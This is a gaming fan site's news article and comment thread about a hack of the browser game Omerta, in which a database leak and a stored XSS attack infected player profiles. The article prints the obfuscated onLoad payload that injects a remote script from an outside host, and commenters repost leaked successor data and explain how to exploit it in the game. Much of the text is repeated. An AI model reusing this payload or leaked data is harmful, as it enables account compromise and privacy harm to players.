» Menu
» OB/Site News
» Articles
» Barafranca News
No news found. Reset in progress?
 |
|
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.
Barafranca News: Connection problems - fixed
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Barafranca News: Connection problems - fixed
By Brando: There was a hardware problem which was solved by switching that machine off.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)
Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Anonymous (20:55:33 - 28-09)
maybe a stupid question but i dont really understand, what happened and what effect does it have?
Anonymous (20:55:24 - 28-09)
Anonymous at 20:49:13 on 28/09:
how do you know ?
a lot can change in 2 weeks ? so how do you know that the list (which seems correct because most of the named successors are members of the fam, and brug) is not right ? unless you know all the successors ?
how do you know ?
a lot can change in 2 weeks ? so how do you know that the list (which seems correct because most of the named successors are members of the fam, and brug) is not right ? unless you know all the successors ?
all the same, old setting from a longer time ago
Anonymous (20:54:23 - 28-09)
Anonymous at 20:48:20 on 28/09:
Its 2 weeks like the guy said. It was 100% correct back then.
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)
isn't correct 100% :)
Its 2 weeks like the guy said. It was 100% correct back then.
it isn't
my famlog doesn't lie at all
succeror ID doesn't confirm with the succesor, even not before those 2 weeks,
these stats are like correct for here when i go back much more back then 2 weeks
Anonymous (20:49:13 - 28-09)
how do you know ?
a lot can change in 2 weeks ? so how do you know that the list (which seems correct because most of the named successors are members of the fam, and brug) is not right ? unless you know all the successors ?
a lot can change in 2 weeks ? so how do you know that the list (which seems correct because most of the named successors are members of the fam, and brug) is not right ? unless you know all the successors ?
Anonymous (20:48:20 - 28-09)
Anonymous at 20:41:37 on 28/09:
isn't correct 100% :)
isn't correct 100% :)
Its 2 weeks like the guy said. It was 100% correct back then.
Anonymous (20:41:37 - 28-09)
isn't correct 100% :)
Anonymous (20:08:29 - 28-09)
Verified at a number of other families too. Data is correct.
Anonymous (20:06:10 - 28-09)
Ilimitada
First: Blade
Second: Seymour
Righelli
First: Psychogrll
Second: Kiff
Xzone
First: Darude
Second: Shang
Blacksea
First: Bdback
Second: Hatchet
Cogere
First: Yap
Second: Audiowaste
There, thats the top5.
That took maybe 3-4minutes tops.
You get the idea, and im sure some top mentioned above can verify this info as real.
You could get a complete list within an hour or so, if you cared enough.
Omerta got hacked, period.
First: Blade
Second: Seymour
Righelli
First: Psychogrll
Second: Kiff
Xzone
First: Darude
Second: Shang
Blacksea
First: Bdback
Second: Hatchet
Cogere
First: Yap
Second: Audiowaste
There, thats the top5.
That took maybe 3-4minutes tops.
You get the idea, and im sure some top mentioned above can verify this info as real.
You could get a complete list within an hour or so, if you cared enough.
Omerta got hacked, period.
Anonymous (19:57:32 - 28-09)
Just for the ones that dont understand it:
Those id's are player id's, for example:
Fam nr 2 on the list, Resistance, has no valid first succesor and the second succesor is the player with the id 234279.
Now, when we run that same number ingame it becomes:
http://www.barafranca.com/user.php?idn=234279
Which results to:
User: Bulykin / (Add to your friends list) / Action / History
Rank: Bruglione
Honour points: 885
Status Alive and online in the past 5 minutes (3d 15h 25m total)
Sottocapo of: Resistance
As a result, shooting that Bulykin account and then the Don of said fam will cause the fam to go down, if the succesors havent been altered since the list was produced.
Its done Brando, game over.
No more hide and seek time, time to step up and take this shit like a man.
You blamed pretty much every other single fail in the past on people that have either quit or got fired already, but this time its you that has to take the hit directly.
Those id's are player id's, for example:
Fam nr 2 on the list, Resistance, has no valid first succesor and the second succesor is the player with the id 234279.
Now, when we run that same number ingame it becomes:
http://www.barafranca.com/user.php?idn=234279
Which results to:
User: Bulykin / (Add to your friends list) / Action / History
Rank: Bruglione
Honour points: 885
Status Alive and online in the past 5 minutes (3d 15h 25m total)
Sottocapo of: Resistance
As a result, shooting that Bulykin account and then the Don of said fam will cause the fam to go down, if the succesors havent been altered since the list was produced.
Its done Brando, game over.
No more hide and seek time, time to step up and take this shit like a man.
You blamed pretty much every other single fail in the past on people that have either quit or got fired already, but this time its you that has to take the hit directly.
Ha. Good thing I use a junk email and a password that isn't linked to anything else for this shit game. Good job Omerta \o/
Anonymous (19:38:42 - 28-09)
Anonymous at 19:35:34 on 28/09:
http://pastebin.com/qqZq443V
let it be known ~~
http://pastebin.com/qqZq443V
let it be known ~~
This is the final nail in the coffin of Brando spreading bullshit about the DB not breached but that info was only gained trough xss.
DB was hacked.
Anonymous (19:35:34 - 28-09)
http://pastebin.com/qqZq443V
let it be known ~~
Anonymous (18:47:53 - 28-09)
@ Steve/Brando: These ranting fits does nothing but alienate the community that (through donations) helps feed your family. Why not start treating this community as the paying customers we are? Of course there are two sides to every story and I also get tired of the flaming etc... but the latest outbursts on this site along with a history of poor communication has simply alienated your customer base. I stopped donating and only log in for nostalgic reasons - not because I am tired of the game or the friends I have made here but because I will not continue to buy a product with inconsistent service and care. That is my only but very significant power as a consumer. The community is all that is keeping your business alive at the moment. You offer a service and consumers have expectations. This hardly matches up anymore. You and your crew have years of "abusive" (strong word hence the "") behavior towards your customers to rectify and it is just not happening. I became a fan of your proactive approach to scripting but you are lacking an engaged and consistent group of community managers. And you need to refill that prescription of Valium. Talk to your community. Don't treat us like vermin. Make me a customer again.
Just my advice from one business mind to another.
@ Rix and crew: You derelicts! Keep it up and keep it honest. :)
Gigollo (I would not have posted Anonymous if I could just remember that %@&!* password)
Just my advice from one business mind to another.
@ Rix and crew: You derelicts! Keep it up and keep it honest. :)
Gigollo (I would not have posted Anonymous if I could just remember that %@&!* password)
Soph at 17:09:08 on 28/09:
Time for an update on this article? When dictators silence the media, the media hits back! There ought to be a way to get the community to listen! :)
Time for an update on this article? When dictators silence the media, the media hits back! There ought to be a way to get the community to listen! :)
Time for an update on this article? When dictators silence the media, the media hits back! There ought to be a way to get the community to listen! :)
FU RIX SBANKS! :@:@:@:@ now I'm frozen for the first time ever :( because of you fucking fagfaces
I hatez you :(
oke lies :$
I hatez you :(
oke lies :$
Yep (16:39:03 - 28-09)
Those asses G-lined m-bot also, best bot on omerta! :<
loverboy (16:14:18 - 28-09)
Rix at 15:34:06 on 28/09:
Hmm you're right, it's 515. Dunno why Sbanks said 100.
Anonymous at 15:28:27 on 28/09:
Btw its posted over 500 on that list, not 100, counted it roughly.
Btw its posted over 500 on that list, not 100, counted it roughly.
RIP rix for doing your job...
sad to see all this,
great job done always, and now this....
says how low the crew can go with their power abuse :)
loverboy (16:12:16 - 28-09)
VERY VERY VERY SAD admins :')
g-lining, a-killing...
nice nice nice,
to dumb to accept your faults, only making everything more worse by doing this all :')
game was already half death bcs of your 'new' things,
crew wasn't that populair anymore,
now you guys all made your move that screwed it all i guess
g-lining, a-killing...
nice nice nice,
to dumb to accept your faults, only making everything more worse by doing this all :')
game was already half death bcs of your 'new' things,
crew wasn't that populair anymore,
now you guys all made your move that screwed it all i guess